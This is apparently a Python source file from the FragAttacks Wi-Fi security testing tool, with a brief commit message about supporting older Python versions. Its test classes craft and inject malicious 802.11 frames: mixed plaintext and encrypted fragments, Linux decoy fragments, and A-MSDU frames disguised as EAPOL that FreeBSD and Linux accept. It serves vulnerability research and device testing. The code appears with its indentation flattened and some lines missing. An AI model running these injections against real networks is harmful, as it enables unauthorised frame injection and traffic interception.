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synced 2025-02-17 17:43:06 -05:00
There are only supported on Python 3.6 and above. With openwifi we likely need to support an older Python version. This patch may be reverted in the future once support for older Python versions is no longer needed.
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# Copyright (c) 2020, Mathy Vanhoef <mathy.vanhoef@nyu.edu>
# This code may be distributed under the terms of the BSD license.
# See README for more details.
from fraginternals import *
import copy
class FragInfo:
def __init__(self, num=0, morefrag=False):
self.num = num
self.morefrag = morefrag
class PingTest(Test):
def __init__(self, ptype, fragments, separate_with=None, opt=None):
self.ptype = ptype
self.separate_with = separate_with
self.bcast_ra = False if opt == None else opt.bcast_ra
self.bcast_dst = False if opt == None else opt.bcast_dst
self.as_msdu = False if opt == None else opt.as_msdu
self.icmp_size = None if opt == None else opt.icmp_size
self.padding = None if opt == None else opt.padding
self.to_self = False if opt == None else opt.to_self
self.bad_mic = False if opt == None else opt.bad_mic
self.dport = None if opt == None else opt.udp
def parse_meta_actions(self):
relevant_actions = list(filter(lambda act: act.is_meta(Action.MetaDrop) or act.action == Action.Inject,
# All fragments except the last have the MoreFragment flag set (True)
fraginfos = [FragInfo(fragnum, True) for fragnum in range(len(relevant_actions) - 1)]
# The last fragment doesn't have the MoreFragment flag set (False)
fraginfos.append(FragInfo(len(relevant_actions) - 1, False ))
# Now remove fragment info for the MetaDrop actions
self.fraginfos = [fraginfo for fraginfo, act in zip(fraginfos, relevant_actions)
if act.action == Action.Inject]
# Remove all MetaDrop actions
self.actions = list(filter(lambda act: not act.is_meta(Action.MetaDrop), self.actions))
def prepare(self, station):
log(STATUS, "Generating ping test", color="green")
# Generate the header and payload
header, request, check_fn = generate_request(station, self.ptype, icmp_size=self.icmp_size, \
padding=self.padding, to_self=self.to_self, dport=self.dport)
# We can automatically detect the result if the last fragment was sent after a connected event.
# Note we might get a reply during a rekey handshake, and this will be handled properly.
if any([act.trigger >= Action.AfterAuth for act in self.actions]):
self.check_fn = check_fn
if self.as_msdu == 1:
# Set the A-MSDU frame type flag in the QoS header
# Encapsulate the request in an A-MSDU payload
request = create_msdu_subframe(station.mac, station.get_peermac(), request)
elif self.as_msdu == 2:
# Set A-MSDU flag but include a normal payload (fake A-MSDU)
# Generate all the individual (fragmented) frames
num_frags = len(self.get_actions(Action.Inject))
frames = create_fragments(header, request, num_frags)
# Assign frames to the existing fragment objects
for frag, frame in zip(self.get_actions(Action.Inject), frames):
if self.bcast_ra:
frame.addr1 = "ff:ff:ff:ff:ff:ff"
if self.bcast_dst:
if header.FCfield & Dot11(FCfield="to-DS").FCfield != 0:
frame.addr3 = "ff:ff:ff:ff:ff:ff"
frame.addr1 = "ff:ff:ff:ff:ff:ff"
# Set fragment number and MoreFragment flags according to parsed MetaDrop rules
fraginfo = self.fraginfos.pop(0)
frame.SC = (frame.SC & 0xfff0) | fraginfo.num
if fraginfo.morefrag:
frame.FCfield |= Dot11(FCfield="MF").FCfield
frag.frame = frame
# Take into account encryption options
frag.bad_mic = self.bad_mic
# Put the separator after each fragment if requested.
if self.separate_with != None:
for i in range(len(self.actions) - 1, 0, -1):
# Check if the previous action is indeed an injection
prev_frag = self.actions[i - 1]
if prev_frag.action != Action.Inject:
# Create a similar inject action for the seperator
sep_frag = Action(prev_frag.trigger, enc=prev_frag.encrypted)
sep_frag.frame = self.separate_with.copy()
self.actions.insert(i, sep_frag)
class ForwardTest(Test):
def __init__(self, eapol=False, dst=None, large=False):
if eapol:
actions = [Action(Action.StartAuth, enc=False)]
actions = [Action(Action.Connected, enc=True)]
if large:
actions += copy.deepcopy(actions)
actions += copy.deepcopy(actions)
self.eapol = eapol
self.dst = dst
self.large = large
self.magic = b"forwarded_data"
def prepare(self, station):
# Construct the header of the frame
header = station.get_header(prior=2)
if header.FCfield & Dot11(FCfield="to-DS").FCfield == 0:
log(ERROR, "It makes no sense to test whether a client forwards frames??")
if self.dst == None:
header.addr3 = station.mac
self.check_fn = lambda p: self.magic in raw(p)
header.addr3 = self.dst
# Determine the type of data to send
if self.eapol:
request = LLC()/SNAP()/EAPOL()/Raw(self.magic)
request = LLC()/SNAP()/IP()/Raw(self.magic)
# Wether to send large requests
if self.large:
request = request/Raw(b"A" * 3000)
# Create the actual frame(s)
frames = create_fragments(header, request, len(self.actions))
for frag, frame in zip(self.get_actions(Action.Inject), frames):
frag.frame = frame
class LinuxTest(Test):
def __init__(self, ptype, decoy_tid=None):
# Note: to inject immediately after 4-way provide IPs using --ip and --peerip
Action(Action.Connected, Action.GetIp),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=True),
Action(Action.Connected, enc=False)
self.ptype = ptype
self.decoy_tid = decoy_tid
def prepare(self, station):
header, request, self.check_fn = generate_request(station, self.ptype)
frag1, frag2 = create_fragments(header, request, 2)
# Fragment 1: normal
self.actions[0].frame = frag1
# Fragment 2: make Linux update latest used crypto Packet Number. Use a dummy packet
# that can't accidently aggregate with the first fragment in a corrrect packet.
p = station.get_header(prior=2)/LLC()/SNAP()/IP()/Raw(b"linux-plain decoy fragment")
p.SC = frag2.SC ^ (1 << 4)
# - In the attack against Linux, the decoy frame must have the same QoS TID.
# - On the other hand, some devices seem to only cache fragments for one sequence
# number per QoS priority. So to avoid overwriting the first fragment, add this
# option to use a different priority for it.
p.TID = 2
if self.decoy_tid != None:
p.TID = 3
self.actions[1].frame = p
# Fragment 3: can now inject last fragment as plaintext
self.actions[2].frame = frag2
class EapolTest(Test):
# Test 1: plain unicast EAPOL fragment, plaintext broadcast frame => trivial frame injection
# Test 2: plain unicast EAPOL fragment, encrypted broadcast frame => just an extra test
# Test 3: plain unicast EAPOL fragment, encrypted unicast fragment => demonstrates mixing of plain/encrypted fragments
# Test 4: EAPOL and A-MSDU tests?
def __init__(self):
Action(Action.BeforeAuth, enc=False),
Action(Action.BeforeAuth, enc=False)
def prepare(self, station):
header = station.get_header(prior=2)
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frag1, frag2 = create_fragments(header, data=request, num_frags=2)
frag1copy, frag2copy = create_fragments(header, data=request, num_frags=2)
frag1copy.addr1 = "ff:ff:ff:ff:ff:ff"
frag2copy.addr1 = "ff:ff:ff:ff:ff:ff"
self.actions[0].frame = frag1
self.actions[0].frame = frag2
class EapolAmsduTest(Test):
TODO: Combine this class with PingTest so we have more advanced argument handling
def __init__(self, ptype, actions, freebsd=False, opt=None):
self.ptype = ptype
self.freebsd = freebsd
self.bcast_dst = False if opt == None else opt.bcast_dst
#TODO: More automatically control ptype and its arguments
self.dport = None if opt == None else opt.udp
actions = self.get_actions(Action.Inject)
if len(actions) != 1:
log(ERROR, "eapol-amsdu: invalid arguments, should only give 1 inject action (gave {}).".format(len(actions)))
def prepare(self, station):
log(STATUS, "Generating cloacked A-MSDU test", color="green")
# Generate the single frame
header, request, check_fn = generate_request(station, self.ptype, dport=self.dport)
# Set the A-MSDU frame type flag in the QoS header
# We can automatically detect the result if the last fragment was sent after a connected event.
# Note we might get a reply during a rekey handshake, and this will be handled properly.
if any([act.trigger >= Action.AfterAuth for act in self.actions]):
self.check_fn = check_fn
mac_src = station.mac
mac_dst = station.get_peermac()
if self.bcast_dst:
mac_dst = "ff:ff:ff:ff:ff:ff"
# Masquerade A-MSDU frame as an EAPOL frame
if self.freebsd:
log(STATUS, "Creating malformed EAPOL/MSDU that FreeBSD/Linux/.. treats as valid")
request = freebsd_create_eapolmsdu(mac_src, mac_dst, request)
request = LLC()/SNAP()/EAPOL()/Raw(b"\x00\x06AAAAAA") / create_msdu_subframe(mac_src, mac_dst, request)
frames = create_fragments(header, request, 1)
toinject = frames[0]
# Make sure addr1/3 matches the destination address in the A-MSDU subframe(s)
if self.bcast_dst:
if toinject.FCfield & Dot11(FCfield="to-DS").FCfield != 0:
toinject.addr3 = "ff:ff:ff:ff:ff:ff"
toinject.addr1 = "ff:ff:ff:ff:ff:ff"
# Note: previously I also sent an Auth to 00:..:55 but that doesn't seem to be needed.
actions = self.get_actions(Action.Inject)
actions[0].frame = toinject